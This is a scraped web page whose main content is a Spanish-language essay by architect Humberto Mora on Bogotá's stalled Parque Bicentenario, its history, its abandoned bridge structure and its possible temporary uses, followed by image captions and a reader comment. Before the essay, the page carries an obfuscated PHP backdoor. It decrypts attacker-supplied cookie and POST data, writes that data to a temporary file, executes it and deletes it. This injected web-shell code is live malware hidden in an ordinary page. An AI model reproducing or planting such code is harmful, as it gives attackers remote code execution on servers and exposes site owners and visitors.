$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> PARQUE BICENTENARIO – www.interferencechannel.com

PARQUE BICENTENARIO

UN PUENTE ABANDONADO

Vista Obra Parque Bicentenario desde Oriente sobre la Avenida el Dorado.

Cuando su estructura aparentemente abandonada se habría vuelto parte del paisaje urbano y se habría grabado en el imaginario colectivo, convirtiéndose en un referente en la ciudad, se habla de la reactivación del proyecto del Parque Bicentenario. Ésta conllevaría a la esperada transformación de uno de los sectores más emblemáticos de Bogotá. Se vuelve a especular acerca de una fecha de apertura de uno de los espacios públicos más importantes de esta ciudad que, paradójicamente, es desconocido por muchos. Es entonces relevante preguntarse y recordar ¿Cuál es la necesidad del Parque Bicentenario? ¿Qué fue y qué podría haber sido en los últimos años? En concordancia con esta edición, ¿en qué sentido es una interferencia? y, finalmente, ¿Cómo va a ser?

Todas las propuestas [1] posteriores del Parque Bicentenario buscaron conectar un conjunto de elementos arquitectónicos dispersos en dos áreas de ciudad, pretendiendo en todos los casos crear un espacio público sobre una autopista, como una interferencia canalizadora de flujo peatonal. Esta estrategia ha sido probada en múltiples proyectos de referencia del mundo como  El High Line de Nueva York.  Desde principios  del siglo XX, se han establecido alrededor del Centro Internacional  hitos urbanos, como el primer conjunto de parques para conmemorar el centenario del nacimiento de Simón Bolívar y el centenario de la independencia de Colombia. Así, el Parque Bicentenario hace alusión al antiguo Parque Centenario y su nombre fue establecido por la Administración distrital (2008-2011).

Plan Maestro Rogelio Salmona.

La construcción de la versión más reciente de este proyecto, se  inició  en 2011  y fue detenida hace más de tres años, convirtiéndose en un gran vacío urbano en el  cual se han generado dinámicas diferentes a las pensadas en el proyecto inicial. La estructura ha  acentuado la división entre los sectores al norte y al sur de la 26, actuando como una interferencia física y temporal a escala urbana. Los residentes desconocen el proyecto y asocian el producto final al monstruo de concreto que se ha perpetuado  como monumento a  un proceso administrativo. Hasta el momento, el parque ha sido  un puente abandonado (ver foto Obra Parque Bicentenario desde Biblioteca Nacional)  que a la espera de decisiones administrativas,  pudo haber sido intervenido en beneficio de la ciudad.

Dada su proximidad al MamBo, la estructura se percibe como una extensión de éste  (ver foto Obra Parque Bicentenario desde Museo de Arte Moderno de Bogotá) pero no se ha vivido como tal. La estructura abandonada pudo ser aprovechada temporalmente como un espacio de creación artística como ha ocurrido en otras partes del mundo. Un caso de referencia es Kunsthaus Tacheles, un edificio  tomado por artistas tras la caída del muro de Berlín que se convirtió en un centro cultural por más de veinte años y fue uno de los lugares más emblemáticos de esta ciudad. En esta galería los visitantes podían asistir a procesos creativos, interactuar con los artistas y ser parte de su obra,  y vivían el edificio como museo. Además,  al estar sobre  la Calle 26, puerta de llegada y de salida de Bogotá, y ser un espacio muy visible en la ciudad, la ruina del bicentenario  pudo haber servido como espacio publicitario, de instalaciones artísticas, e incluso convertirse en un muro de luz en las noches, para recordar la existencia de un referente de ciudad aparentemente olvidado.

Obra Parque Bicentenario desde Biblioteca Nacional.

Éste es sólo un ejemplo  concreto de un fenómeno recurrente en Bogotá donde proyectos públicos y privados son pausados con frecuencia, generando interferencias de desarrollo en la ciudad. Algunos movimientos urbanos han buscado resaltar el deterioro  urbano a través de la intervención de estructuras abandonadas como es  caso del experimento Bewareofcolour [2] . Esta iniciativa, liderada por el artista Yasmany Arboleda,  buscó resaltar con pintura rosada   edificaciones abandonadas en Johanesburgo con potencial para ser habitados  como reclamo a procesos de de-gentrificación, con el fin de destacar su presencia en la ciudad. Vale la pena preguntarse cuál sería  el mapa de estructuras abandonadas  a la espera de definiciones administrativas en Bogotá y su potencial de intervención temporal desde un punto de vista urbano.

El Parque Bicentenario ha sido un espacio de interferencia en múltiples sentidos, desde su concepción original como  un puente-parque sobre una autopista, en respuesta a la ruptura de un eje vial, hasta convertirse en un vacío que interferiría en las dinámicas urbanas y en su tiempo de desarrollo. Ahora se puede  volver a esperar la terminación de este proyecto, correspondiente al diseño más reciente, de Giancarlo Mazzanti.

¿Cómo va a ser?

Obra Parque Bicentenario desde Museo de Arte Moderno de Bogotá.

Humberto Mora

arquitecto

[1] Proyectos específicos para el Centro Internacional (Taller de Espacio Público – TEP,1998-2000), Plan Director del parque Metropolitano La independencia ( Corporación la Candelaria- Arq. Rogelio Salmona, 2006), Modificación al Plan Director del Parque Metropolitano de la Independencia (Secretaría Distrital de Planeación-Arq. Juan Camilo Santamaria, 2008), Modificación al Plan Director del Parque Metropolitano de la Independencia (Instituto de Desarrollo Urbano e Instituto de Patrimonio Cultural – Arq. Giancarlo Mazzanti, 2011).

[2] http://www.theguardian.com/world/2014/sep/08/painting-johannesburg-pink-neglected-high-rises

Vista aérea Antes y Después.

Planta Urbana. Conexión del proyecto con la ciudad.

Planta de Localización.

Planta Parque Bicentenario.

Comparación Perfiles del Parque Bicentenario con Proyecto de Rogelio Salmona.

Vista Aérea desde el Norte.

Vista Aérea Zoom desde el Norte.

Vista Aérea Plataformas Parque Bicentenario.

Vista Aérea empate de Parque Bicentenario con Carrera Séptima.

Vista Aérea empate Parque Bicentenario con Museo de Arte Moderno.

Vista desde Parque de la Independencia.

No Responses to “PARQUE BICENTENARIO

  • Yonalex
    8 years ago

    No se ve muy bien la imagen de los perfiles.